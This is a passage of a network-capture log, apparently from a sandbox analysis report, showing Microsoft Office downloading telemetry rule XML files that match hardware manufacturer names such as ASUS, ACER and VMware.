                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                21192.168.2.54976113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 1ae852e8-d01e-008e-29f5-24387a000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210223Z-15b8d89586f8nxpt6ys645x5v000000006x00000000010wx
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                22192.168.2.54975913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 8384fc49-f01e-00aa-06d4-268521000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210223Z-17c5cb586f67hfgj2durhqcxk800000004c000000000eupx
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                23192.168.2.54976313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 226d2935-b01e-001e-729c-270214000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210223Z-r197bdfb6b42rt68rzg9338g1g00000006qg00000000hbyh
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                24192.168.2.54976413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:23 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210223Z-16849878b782d4lwcu6h6gmxnw000000054g00000000uzgw
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                25192.168.2.54977513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210225Z-16849878b78q9m8bqvwuva4svc0000000460000000002rcn
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                26192.168.2.54977413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 464
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210225Z-16849878b78qg9mlz11wgn0wcc000000052g00000000rp90
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                27192.168.2.54977113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 2fd6bd5d-d01e-007a-394f-26f38c000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210225Z-16849878b78g2m84h2v9sta29000000004dg00000000n0rt
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                28192.168.2.54977213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210225Z-16849878b7898p5f6vryaqvp5800000006d000000000bd0k
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                29192.168.2.54977313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:25 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
